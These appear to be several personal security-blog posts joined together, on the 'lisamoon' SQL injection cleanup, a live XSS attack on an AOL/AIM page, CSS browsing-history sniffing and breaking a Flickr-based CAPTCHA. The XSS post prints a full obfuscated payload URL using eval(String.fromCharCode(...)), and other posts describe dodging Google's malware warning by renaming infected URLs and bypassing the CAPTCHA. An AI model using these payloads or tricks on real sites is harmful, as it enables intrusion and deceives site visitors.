I recently did a post on the lisamoon SQL injection attack and one of the cool things about it was that google detected the attack, showed where it was living on the domain and processed the reconsideration request very promptly

When you enter into Google Webmaster Tools and they have detected a malicious script or exploit on your domain they will show you a red alert warning you of the infection

After you have gone and and cleaned everything up and hopefully closed any of the SQL injection holes their malicious hacker crawler found then you can tell Google to stop showing that giant red warning when people are going to pages that were infected
The alert seems to be generated automatically so im pretty sure it reruns the automated scan that detected the problem in the first place. But based on the response time Im gonna say there is no human verification of the removal of the malicious code.

Some things to note while you working on getting it clean if that the big red warnings that try to send users away are created at a url or folder level so by renaming files you can make the warning go away even before Googles security bot has checked for infection again

The easiest way to do the renaming would probably be using the .htaccess file and rewriting the url to a new name and adding a canonical tag to the page

Ok so i ran into this SQL injection attack today and I wanted to throw up some info on how to clean your database, what the code probably looked like and what you need to do to protect yourself in the future... this is the little code snippet that is injected onto all the string columns in the database you can see how they use the </title> to try and jump out of the title tag (if a column is title tag) so the script would be run in the head. it also doesnt check for previos infections so you can see on some sites its strung 2 or 3 times
]]>
based on what ive seen and found Im gonna take an educated guess and say that this is a hackers spider that has been designed to look for fingerprints of exploitable code and automates the hacking. doing a google search for the string it drops you can find pages of results that have been compromised. here are some of the victims of the attack

• http://www.cmobjects.com/default.asp?ID=09984D98CB604C0B8A69566F9145173E
• http://www.cheerextreme.com/toast/toast.asp
• http://www.ybm.org.il/hebrew/Article.aspx?Item=1139

and not only that there arent many people talking about it... apparently it made it to itunes at some point and other people have mentioned it on forums so who knows how many domains have been affected... ill update this soon with a removal stored procedure... i forgot the code at the office

Heres my video about exploiting cross site scripting attacks in the wild, I found a hole in AOL's promotion page and had my video playing on their domain in less than 5 min

See the attack and video live on the page

or watch below (ill have this link live as long as it works)

The javascript we inject is shown below

which url encodes to...
http://www.aim.com/features/aimandfacebook?aimID=carterkixass%3Cbr%3E%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,111,98,106,101,99,116,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,112,97,114,97,109,32,110,97,109,101,61,39,109,111,118,105,101,39,32,118,97,108,117,101,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,62,60,47,112,97,114,97,109,62,60,101,109,98,101,100,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,32,116,121,112,101,61,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,115,104,111,99,107,119,97,118,101,45,102,108,97,115,104,39,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,47,101,109,98,101,100,62,60,47,111,98,106,101,99,116,62,34,41,59))%3C/script%3E

This is a demonstration of a live attack meant for educational purposes only... if you want to see my copy is here: AOL XSS attack landing page If you are having issues with XSS attacks on your domain or would like help on securing your application, contact me id love to help

P.S. the tool I used to do string encoding is here

OK so what is Start Panic!

Basically all it does is enumerate your browsing history… but that’s a lot. Everything we do now is online and all those sites we use to do everything from our banking to our social networking. First I want to quickly cover why this information should be kept secret and then explain exactly how they are getting to it.
First this on its own is hardly a problem aside from some embarrassing browsing history there isn’t a lot you can do with the history you steal but combined with the classics (social engineering, weak passwords and phishing) you could be in a lot of trouble. It happened to twitter just recently and it can happen to you, people can guess security questions based on your social networking sites responses “where did you first go to school” or “what’s your pet’s name” are no longer hard to find and you browsing history will tell them exactly where they can find you profiles. With some basic info on you and a crafty email many would fall for a phishing scam and from there they can get even more. 61% of passwords are reused for all sites (1) and that means if one of your online profiles is lost they all are in danger especially if it’s your webmail account. They can just have the sites reset your passwords for them. Yahoo has taken one of the first measures against this by having multiple security questions and the ability to reset your password with your cell but many sites still don’t offer this service.
But enough with the scare tactics let’s look at exactly how this attack is conducted and how some simple functionality gave the attacker the keys to the kingdom.
CSS is the new way to style text on the web and it’s responsible for much of the explosion in design creativity but it can also leak important info (such as your browsing history)
Consider this css:

Now any links will only display if they have been visited. They write a large number of links to the page from common sites like facebook, or your bank and it’s a simple task to make some JavaScript to check which links on the page are displayed. It’s done they have your browsing history (and know what sites you use and where you bank online)
There is no way to prevent this attack, it is still possible to perform this attack with no JavaScript (it involves using a server side script and requests to the server for images) but it is uncommon and unreliable. So watch out and clear your history because you don’t know who’s reading your history as you pass by on the world wide web

1) http://www.readwriteweb.com/archives/majority_use_same_password.php

The other day i was minding my own business running around the internet and then i came across a blog with an awesome picture CAPTCHA... i wanted to know how it was done and took a peek at where the image was served from... Flickr!



So how would I have created this service? Tags on the images from the API... so if we can find the photo used then we can reverse the process and break the CAPTCHA...

Well lucky us theres an API that does exactly what we need... the urls for the images look like this...
http://farm4.static.flickr.com/3503/3836827765_2d7f39811d_s.jpg

first number is the picture id and the second is the secret... we pass these to the flickr.photos.getInfo (documentation) and get back exactly what we need... the picture's info and tags associated with it...

ive wired this up so it will pull a random test from the CAPTCHA's server and boom we can not only break the system but we can bypass it... this will return the answer every time :)

so just to be clear this page is actually breaking a captcha each time it loads... its pulling the remote captcha, parsing the results and sending off requests to Flickr to pull the tags for each image detected (all in javascript)... the green borders represent the images it has detected as answers to captcha

The code that gets displayed must be viewed on the original post

I actually really liked using this captcha it went must faster than other ones but the problem is I was able to reverse the process of image selection and break the CAPTCHA... i knew this wasn't the first of the Flickr based system that I had heard of so i went out and found another one but it was protected... it proxies the image through a PHP script on the blog to hide the original Flickr url and prevent my attack from working...

This WordPress plugin has a few thousand users and i was able to bypass the test in just a couple minutes, this just further proves the idea that security is hard because you have to fix every hole in the system and the hacker only has to find one.